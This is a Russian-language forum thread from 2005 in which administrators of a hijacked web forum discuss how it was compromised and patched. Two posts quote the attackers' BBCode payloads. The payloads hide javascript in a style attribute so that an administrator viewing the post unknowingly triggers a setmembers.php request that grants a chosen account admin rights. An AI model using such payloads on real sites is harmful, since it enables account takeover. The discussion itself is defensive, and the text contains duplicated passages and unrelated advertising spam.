11. Plextor - 03 Апреля, 2005 - 13:57:21 - перейти к сообщению
Да, кажись трабла такая уже решалась и заплатку вроде я тоже ставил, что за хрень? Попробую проверить...
12. Alone - 03 Апреля, 2005 - 14:03:00 - перейти к сообщению
И вообще это очень хороший урок - никогда не заходить сразу на форум как админ. А когда выходишь всегда нажимать на ктопочку "выход".
Осталось только узнать как он это засунул в топик...
Может Маркус чё расскажет.
Осталось только узнать как он это засунул в топик...
Может Маркус чё расскажет.
13. TvoyWeb - 03 Апреля, 2005 - 17:50:24 - перейти к сообщению
Plextor
Не удаляй его поста. Зайди на форум как модератор и через правку сообщения посмотри исходный текст его поста. И выложь его здесь.
Не удаляй его поста. Зайди на форум как модератор и через правку сообщения посмотри исходный текст его поста. И выложь его здесь.
14. Владимир - 03 Апреля, 2005 - 19:09:03 - перейти к сообщению
Цитата:
Насколько я понимаю в этот момент модератор изчезнет... Может лучше по FTP папку с форумом качнуть?Зайди на форум как модератор и...
15. TvoyWeb - 03 Апреля, 2005 - 19:14:25 - перейти к сообщению
Владимир пишет:
Насколько я понимаю в этот момент модератор изчезнет...
Нет, не исчезнет. Это расчитано только на админов, то есть тех у кого есть доступ к админке. У модераторов такого доступа нет.
16. Alone - 03 Апреля, 2005 - 19:54:01 - перейти к сообщению
А это чё такое может быть?\n\n(Добавление)
Только что пост зафиксировал.\n\n(Добавление)
Plextor
Так я смотрю он у тебя и 1.php тоже сожрал... Ты получал по личным сообщениям от него сообщение с кодом?
И ещё:
Все посты которые он делал у тебя в новых темах - он все их потом редактировал?
Только что пост зафиксировал.\n\n(Добавление)
Plextor
Так я смотрю он у тебя и 1.php тоже сожрал... Ты получал по личным сообщениям от него сообщение с кодом?
И ещё:
Все посты которые он делал у тебя в новых темах - он все их потом редактировал?
17. Владимир - 03 Апреля, 2005 - 20:33:30 - перейти к сообщению
А ежели в setmembers.php edit_user исправить на edit_user_что_нибудь_еще в двух местах? Правда это должен делать каждый сам себе... Для общего случая наверно не годится.
Alone
А что за личные сообщения с кодом?
\n\n(Добавление)
Alone
А что за личные сообщения с кодом?
\n\n(Добавление)
Цитата:
Я думаю они ссылку на сайт свой пытались другим цветом выделить... Вот форум её и зарубил.А это чё такое может быть?
18. TvoyWeb - 03 Апреля, 2005 - 21:01:13 - перейти к сообщению
Alone пишет:
А это чё такое может быть?
Здесь нет ничего страшного. Просто между последней цифрой и закрывающей квадратной скобкой "]" форумного тега size есть пробел. Можешь проверить. Просто нужно правильно писать форумные теги.
Владимир пишет:
Правда это должен делать каждый сам себе...
Это уже личные настройки. Скорее всего что Plextor не до конца пропатчил свой форум. Покажет код посмотрим.
19. Plextor - 04 Апреля, 2005 - 01:02:39 - перейти к сообщению
TvoyWeb пишет:
Здесь нет ничего страшного. Просто между последней цифрой и закрывающей квадратной скобкой "]" форумного тега size есть пробел. Можешь проверить. Просто нужно правильно писать форумные теги.
Это уже личные настройки. Скорее всего что Plextor не до конца пропатчил свой форум. Покажет код посмотрим.
Alone пишет:
А это чё такое может быть?
Здесь нет ничего страшного. Просто между последней цифрой и закрывающей квадратной скобкой "]" форумного тега size есть пробел. Можешь проверить. Просто нужно правильно писать форумные теги.
Владимир пишет:
Правда это должен делать каждый сам себе...
Это уже личные настройки. Скорее всего что Plextor не до конца пропатчил свой форум. Покажет код посмотрим.
Всё правильно, что-то я лоханулся с пропатчиванием, хотя был уверен что пропатчил, млин... Хорошо ещё что так отделался и проверил безопасность... Вот этот код, который я, уже увидил на этом форуме, по-моему от него Alone пострадал...
CODE:
[url="http://mati.fatal.ru/"style="background:url(javascript:document.location='http://mati.fatal.ru/forum/setmembers.php?
action=edit_user&checkaction=yes&userid=223&membertitle=&emailaddress=lol@lol.
ru&newname=snizz&password=&homepage=&aolname=&icqnumber=&location=&interests=&
signature&numberofposts=942&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%
EF%F0%E0%E2%E8%F2%FC');"]ю[/url]
Ходил по форуму, сайту. Вроде не нашел.::sad24.gif::
Было бы прикольно его поставить.::rolleyes24.gif::
Как вы на это смотрите?
action=edit_user&checkaction=yes&userid=223&membertitle=&emailaddress=lol@lol.
ru&newname=snizz&password=&homepage=&aolname=&icqnumber=&location=&interests=&
signature&numberofposts=942&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%
EF%F0%E0%E2%E8%F2%FC');"]ю[/url]
Ходил по форуму, сайту. Вроде не нашел.::sad24.gif::
Было бы прикольно его поставить.::rolleyes24.gif::
Как вы на это смотрите?
Заплатки поставил, только картинки перестали грузится на сайт
и вложенные цитаты не обрабатываются, последнее я исправил....
20. Alone - 04 Апреля, 2005 - 02:59:37 - перейти к сообщению
Цитата:
А что за личные сообщения с кодом?
Так читай в теме, которую я открывал как-то на этом форуме: Взломан форум http://tvoyweb.ru/forums/topic.p...m=25&topic=7 Там я всё написал как было дело; потом этот пост я даже обнаруживал на некоторых хакерских форумах - типа: делимся опытом
.Вот этот код:
CODE:
[q][color='z=]'style='background:url(javascript:location.href=
"http://www.мойсайт.ru/forum/setmembers.php?
action=edit_user&checkaction=yes&userid=84&membertitle=&emailaddress
=lol@lol.ru&newname=KillBill&password=&homepage=&aolname=&icqnumber
=&location=&interests=&singnature=&numberofposts=0&avatar=
noavatar.gif&membercode
=ad&submit=%CE%F2%EF%F0%E0%E2&E8%F2%FC")'[/color][/q]
"http://www.мойсайт.ru/forum/setmembers.php?
action=edit_user&checkaction=yes&userid=84&membertitle=&emailaddress
=lol@lol.ru&newname=KillBill&password=&homepage=&aolname=&icqnumber
=&location=&interests=&singnature=&numberofposts=0&avatar=
noavatar.gif&membercode
=ad&submit=%CE%F2%EF%F0%E0%E2&E8%F2%FC")'[/color][/q]
Кстати год регистрации был точно такой же 1970.
Цитата:
Здесь нет ничего страшного. Просто между последней цифрой и закрывающей квадратной скобкой "]" форумного тега size есть пробел. Можешь проверить. Просто нужно правильно писать форумные теги.
Вот в точности этот код:
CODE:
[size=18][/size][color=blue][/color]
Занятия ведут дипломированные тренеры.
10 мин. пешком от метро Курская.
Оптимально как для новичков так и для опытных людей.
НАЧАЛЬНЫЙ КУРС
ПРОДВИНУТЫЙ КУРС
МАСТЕР- КЛАСС
ТРЕНИНГИ-ИНТЕНСИВЫ
Занятия ведут дипломированные тренеры.
10 мин. пешком от метро Курская.
Оптимально как для новичков так и для опытных людей.
НАЧАЛЬНЫЙ КУРС
ПРОДВИНУТЫЙ КУРС
МАСТЕР- КЛАСС
ТРЕНИНГИ-ИНТЕНСИВЫ